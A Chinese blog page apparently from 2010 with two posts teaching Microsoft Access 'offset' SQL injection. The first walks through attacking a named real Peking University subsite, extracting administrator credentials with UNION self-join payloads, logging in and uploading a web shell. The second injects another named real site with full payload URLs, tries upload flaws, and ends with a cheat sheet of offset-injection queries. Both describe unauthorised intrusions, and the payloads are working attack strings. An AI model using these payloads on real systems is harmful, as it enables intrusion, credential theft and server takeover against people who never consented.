浏览模式: 标准 | 列表Tag:偏移

Access偏移注入检测北大分站

Submitted by admin
2010, September 11, 10:50 AM

/*作者:莫良 来自黑帽安全技术论坛 转载注明原创*/
0x00
大清早朋友丢来一站要我看,反正蛋疼厉害,就帮帮他呗。一看,哇靠北大分站,上跳板,我们来给他安全检测一番.具体没什么技术含量,高手飘过。
0x01
简单在首页试了几个可能存在注入的链接都失败了,扫扫目录也扫不出个什么东西。就随便进去看看呗,进了一个什么莫斯科大学和北大的联合分院,莫名其妙的来一了一股意念,我觉得这里有搞头,点了一个链接and 1=1;and 1=2,鉴定完毕,存在注入。丢进明小子里看看,发现了通常都会遇见的问题,他字段有点个性,我猜不出来。
大小: 60.78 K
尺寸: 500 x 456
浏览: 35 次
点击打开新窗口浏览全图

猜不出来怎么办呢,那我就手注吧。先用order by来检测字段数。当order by 10的时候返回错误

大小: 64.33 K
尺寸: 500 x 430
浏览: 47 次
点击打开新窗口浏览全图

order by 9返回正常,说明有9个字段。如下图

大小: 93.14 K
尺寸: 500 x 405
浏览: 42 次
点击打开新窗口浏览全图

测试一下union可以不可以使用,我们提交如下语句来测试一下。


http://grs.pku.edu.cn/xw_lhpy/newshow.asp?id=30 union select 1,2,3,4,5,6,7,8,9 from admin

返回如下

大小: 73.11 K
尺寸: 500 x 299
浏览: 31 次
点击打开新窗口浏览全图

看来可以用union联合查询了。我们接下来看看admin有几个字段。提交如下语句

http://grs.pku.edu.cn/xw_lhpy/newshow.asp?id=30 union select 1,* from admin

 

http://grs.pku.edu.cn/xw_lhpy/newshow.asp?id=30 union select 1,2,* from admin

 

http://grs.pku.edu.cn/xw_lhpy/newshow.asp?id=30 union select 1,2,3,* from admin

 

大小: 73.72 K
尺寸: 500 x 390
浏览: 34 次
点击打开新窗口浏览全图

依次类推,当我提交到union select 1,2,3,4,5,6,* from admin返回正常,说明admin的字段为9-6=3,有3个字段。
0x02
既然知道了admin表字段数,我们来考虑怎么来爆内容呢。这里就是重头戏,我们用偏移表自联来爆吧。
比如有一个表A结构如下

id   name   pass   字段
1    abc     123
2    efg      456
3    hij       789

 

自联
select * from (admin as a inner join admin as b on a.id=b.id)

 

(其中a.id=b.id就是自联条件),将返回以下结果

a.id   a.name   a.pass    b.id    b.name    b.pass
1     abc         123        1        abc          123
2     efg          456        2        efg            456
3     hij           789        3         hij             789

 

通过上面的分析,我们可以自联admin表,admin表是3个字段,自联后也就是2*3=6个字段,然后我们在随便加3个字段凑数就变成了9个字段,打乱admin表中的字段的排列顺序,然后再联合查询,这样就大大增加了被爆出用户跟密码的概率来。即使爆不出来,我们也可以用a.id,跟b.id字段进行偏移,有了思路,下一不就是按着思路依葫芦画瓢。构造自联语句爆爆
union select 1,2,3,* from (admin as a inner join admin as b on a.id=b.id)

大小: 68.03 K
尺寸: 500 x 463
浏览: 44 次
点击打开新窗口浏览全图

爆出了密码?呵呵,我们去挂wwwscan扫扫这个目录的后台,成功发现了后台。再提交

http://grs.pku.edu.cn/xw_lhpy/newshow.asp?id=30 union select 1,username,3,4,5,6,7,8,9 from admin

爆出了管理员账号,如下图

大小: 73.72 K
尺寸: 500 x 410
浏览: 39 次
点击打开新窗口浏览全图

0x03
到这里就差不多了,我登入后台上传了一个shell,具体就不多说了,这里主要讲了关于ACCESS偏移注入的一点东西,其实ACCESS注入的利用空间也是很大的,当知道足够信息以后可以做很多事情。

Tags: access, 偏移

关于access sql 偏移注入

Submitted by admin
2010, August 17, 4:46 PM

来源:http://www.f4le.com/post-37.html

这两天没事,无聊的练习下手工注入。随便找了一个网址输入“'”报错!然后and 发现存在注入!然后判断下数据库类型当然是access的了,然后判断 十四个字段

http://www.f4le.com/show_new.asp?bh=397%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14%20from%20users

大小: 5.25 K
尺寸: 420 x 120
浏览: 46 次
点击打开新窗口浏览全图

然后按常规的思路开始爆用户名,密码字段,但是都不行,然后尝试爆破,但是还是不行,然后百度找了下关于注入的语句,发现便宜注入。尝试、、但不成功,随在群里求助,在这里感谢丶反方向的钟!

他还是用的偏移注入。他发来他的 我才知到我的注入语句写错了。。或者说我只是死套老路子吧。然后用他的注入语句成功获取用户名 密码。

http://www.f4le.com/show_new.asp?bh=394%20and%201=2%20union%20select%20*%20from%20(users%20as%20a%20inner%20join%20users%20as%20b%20on%20a.id=b.id )

大小: 6.5 K
尺寸: 420 x 105
浏览: 43 次
点击打开新窗口浏览全图

找到后台登陆,但发现功能过于简单 如图

大小: 9.39 K
尺寸: 420 x 169
浏览: 45 次
点击打开新窗口浏览全图

但是ewe 编辑器提示是hxcms 7.5免费版 有原名 和远程上传 随暗喜,iis6.的服务器,解析漏洞,上传图片发现还是被重命名了,然后测试远程上传的oday,但是名字还是只取文件的后缀然后重命名,郁闷死!所以真的不好拿到shell了,然后想下载7.5的源码看看,但网上没找到7.5免费版的源码,所以只能放弃了 。

其实主要学习的是注入语句关于偏移注入 稍微总结了下

大致的语句如下

and 1=2 union select * from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,2,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,2,3,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,2,3,*-1,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,a.id,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,a.id,b.id,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select *from( from (users as a inner join users as b on a.id=b.id )

and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select id from admin) as c on c.id=a.id

等等

ps:要灵活运用!!!

Tags: 偏移, 注入